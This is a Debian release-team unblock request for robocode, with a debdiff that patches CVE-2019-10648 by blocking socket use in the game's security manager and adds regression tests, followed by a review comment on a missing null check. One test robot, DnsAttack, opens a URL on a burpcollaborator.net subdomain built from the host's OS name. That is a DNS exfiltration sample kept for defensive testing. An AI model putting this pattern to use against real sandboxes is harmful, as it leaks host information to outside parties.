Package: release.debian.org Severity: normal User: release.debian....@packages.debian.org Usertags: unblock
Please unblock package robocode Robocode in Buster is affected by CVE-2019-10648. The fix applied cleanly and all tests pass. This is Debian bug 926088. Thank you. unblock robocode/1.9.3.3-2 -- System Information: Debian Release: buster/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: amd64 (x86_64) Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: unable to detect
diff -Nru robocode-1.9.3.3/debian/changelog robocode-1.9.3.3/debian/changelog --- robocode-1.9.3.3/debian/changelog 2018-09-13 13:52:33.000000000 +0200 +++ robocode-1.9.3.3/debian/changelog 2019-04-08 00:13:19.000000000 +0200 @@ -1,3 +1,13 @@ +robocode (1.9.3.3-2) unstable; urgency=medium + + * Fix CVE-2019-10648: + Robocode allows remote attackers to cause external service interaction + (DNS), as demonstrated by a query for a unique subdomain name within an + attacker-controlled DNS zone, because of a .openStream call within + java.net.URL. (Closes: #926088) + + -- Markus Koschany <a...@debian.org> Mon, 08 Apr 2019 00:13:19 +0200 + robocode (1.9.3.3-1) unstable; urgency=medium * New upstream version 1.9.3.3. diff -Nru robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch --- robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 1970-01-01 01:00:00.000000000 +0100 +++ robocode-1.9.3.3/debian/patches/CVE-2019-10648.patch 2019-04-08 00:13:19.000000000 +0200 
@@ -0,0 +1,235 @@ +From: Markus Koschany <a...@debian.org> +Date: Mon, 8 Apr 2019 00:11:33 +0200 +Subject: CVE-2019-10648 + +Bug-Debian: https://bugs.debian.org/926088 +Origin: https://github.com/robo-code/robocode/commit/836c84635e982e74f2f2771b2c8640c3a34221bd +--- + .../host/security/RobocodeSecurityManager.java | 26 ++++++++++-- + .../src/main/java/tested/robots/DnsAttack.java | 18 +++++++++ + .../test/robots/TestConstructorHttpAttack.java | 11 +++--- + .../sf/robocode/test/robots/TestHttpAttack.java | 11 +++--- + .../robots/TestStaticConstructorDnsAttack.java | 46 ++++++++++++++++++++++ + 5 files changed, 96 insertions(+), 16 deletions(-) + create mode 100644 robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java + create mode 100644 robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java + +diff --git a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java +index bc4c85a..ebd23e9 100644 +--- a/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java ++++ b/robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java +@@ -12,7 +12,9 @@ import net.sf.robocode.host.IHostedThread; + import net.sf.robocode.host.IThreadManager; + import net.sf.robocode.io.RobocodeProperties; + ++import java.net.SocketPermission; + import java.security.AccessControlException; ++import java.security.Permission; + + + /** +@@ -49,7 +51,6 @@ public class RobocodeSecurityManager extends SecurityManager { + } + + Thread c = Thread.currentThread(); +- + if (isSafeThread(c)) { + return; + } +@@ -84,7 +85,7 @@ public class RobocodeSecurityManager extends SecurityManager { + if (robotProxy != null) { + robotProxy.punishSecurityViolation(message); + } +- throw new AccessControlException(message); ++ throw new SecurityException(message); + } + } + +@@ -94,7 +95,6 @@ public 
class RobocodeSecurityManager extends SecurityManager { + return; + } + Thread c = Thread.currentThread(); +- + if (isSafeThread(c)) { + return; + } +@@ -123,9 +123,27 @@ public class RobocodeSecurityManager extends SecurityManager { + String message = "Robots are only allowed to create up to 5 threads!"; + + robotProxy.punishSecurityViolation(message); +- throw new AccessControlException(message); ++ throw new SecurityException(message); + } + } ++ ++ public void checkPermission(Permission perm) { ++ if (RobocodeProperties.isSecurityOff()) { ++ return; ++ } ++ Thread c = Thread.currentThread(); ++ if (isSafeThread(c)) { ++ return; ++ } ++ super.checkPermission(perm); ++ ++ if (perm instanceof SocketPermission) { ++ IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c); ++ String message = "Using socket is not allowed"; ++ robotProxy.punishSecurityViolation(message); ++ throw new SecurityException(message); ++ } ++ } + + private boolean isSafeThread(Thread c) { + return threadManager.isSafeThread(c); +diff --git a/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java +new file mode 100644 +index 0000000..701e5d8 +--- /dev/null ++++ b/robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java +@@ -0,0 +1,18 @@ ++package tested.robots; ++ ++public class DnsAttack extends robocode.Robot { ++ static { ++ try { ++ new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".") ++ + ".randomsubdomain.burpcollaborator.net").openStream(); ++ } catch (Exception e) { ++ } ++ } ++ ++ public void run() { ++ for (;;) { ++ ahead(100); ++ back(100); ++ } ++ } ++} +diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java +index 8d7b1d7..7930237 100755 +--- 
a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java ++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java +@@ -19,7 +19,7 @@ import robocode.control.events.TurnEndedEvent; + public class TestConstructorHttpAttack extends RobocodeTestBed { + + private boolean messagedInitialization; +- private boolean messagedAccessDenied; ++ private boolean securityExceptionOccurred; + + @Override + public String getRobotNames() { +@@ -36,20 +36,19 @@ public class TestConstructorHttpAttack extends RobocodeTestBed { + messagedInitialization = true; + } + +- if (out.contains("access denied (java.net.SocketPermission") +- || out.contains("access denied (\"java.net.SocketPermission\"")) { +- messagedAccessDenied = true; ++ if (out.contains("java.lang.SecurityException:")) { ++ securityExceptionOccurred = true; + } + } + + @Override + protected void runTeardown() { + Assert.assertTrue("Error during initialization", messagedInitialization); +- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied); ++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); + } + + @Override + protected int getExpectedErrors() { +- return hasJavaNetURLPermission ? 
3 : 2; // Security error must be reported as an error ++ return 2; + } + } +diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java +index 770fb49..06d3bcb 100755 +--- a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java ++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java +@@ -18,7 +18,7 @@ import robocode.control.events.TurnEndedEvent; + */ + public class TestHttpAttack extends RobocodeTestBed { + +- private boolean messagedAccessDenied; ++ private boolean securityExceptionOccurred; + + @Override + public String getRobotNames() { +@@ -31,19 +31,18 @@ public class TestHttpAttack extends RobocodeTestBed { + + final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); + +- if (out.contains("access denied (java.net.SocketPermission") +- || out.contains("access denied (\"java.net.SocketPermission\"")) { +- messagedAccessDenied = true; ++ if (out.contains("java.lang.SecurityException:")) { ++ securityExceptionOccurred = true; + } + } + + @Override + protected void runTeardown() { +- Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied); ++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); + } + + @Override + protected int getExpectedErrors() { +- return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors. ++ return 1; + } + } +diff --git a/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java +new file mode 100644 +index 0000000..bf62373 +--- /dev/null ++++ b/robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java +@@ -0,0 +1,46 @@ ++/** ++ * Copyright (c) 2001-2019 Mathew A. 
Nelson and Robocode contributors ++ * All rights reserved. This program and the accompanying materials ++ * are made available under the terms of the Eclipse Public License v1.0 ++ * which accompanies this distribution, and is available at ++ * https://robocode.sourceforge.io/license/epl-v10.html ++ */ ++package net.sf.robocode.test.robots; ++ ++import net.sf.robocode.test.helpers.RobocodeTestBed; ++import org.junit.Assert; ++import robocode.control.events.TurnEndedEvent; ++ ++/** ++ * @author Flemming N. Larsen (original) ++ */ ++public class TestStaticConstructorDnsAttack extends RobocodeTestBed { ++ ++ private boolean securityExceptionOccurred; ++ ++ @Override ++ public String getRobotNames() { ++ return "tested.robots.DnsAttack,sample.Target"; ++ } ++ ++ @Override ++ public void onTurnEnded(TurnEndedEvent event) { ++ super.onTurnEnded(event); ++ ++ final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot(); ++ ++ if (out.contains("SYSTEM: Using socket is not allowed")) { ++ securityExceptionOccurred = true; ++ } ++ } ++ ++ @Override ++ protected void runTeardown() { ++ Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred); ++ } ++ ++ @Override ++ protected int getExpectedErrors() { ++ return 1; ++ } ++} diff -Nru robocode-1.9.3.3/debian/patches/series robocode-1.9.3.3/debian/patches/series --- robocode-1.9.3.3/debian/patches/series 2018-09-13 13:52:33.000000000 +0200 +++ robocode-1.9.3.3/debian/patches/series 2019-04-08 00:13:19.000000000 +0200 @@ -1,3 +1,4 @@ showJavaDocumentation.patch maven-assembly.patch ecj.patch +CVE-2019-10648.patch
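Review bot: In the new `checkPermission(Permission perm)` override added to RobocodeSecurityManager, the `robotProxy` returned by `threadManager.getLoadedOrLoadingRobotProxy(c)` is dereferenced without a null check, whereas the earlier `-84,7 +85,7` hunk in the same file guards that same call with `if (robotProxy != null)`; a non-safe thread that has no robot proxy would fail with a NullPointerException instead of the intended SecurityException. Suggest `if (robotProxy != null) { robotProxy.punishSecurityViolation(message); }` before the throw, and adding `@Override` to the method for consistency with the rest of the class. SecurityManager also has a `checkPermission(Permission, Object)` variant used for context-based checks; it is not overridden here, so it is worth confirming that socket permission requests cannot reach the superclass through that path without being subject to the new check. The RobocodeSecurityManager class begins and ends outside this hunk.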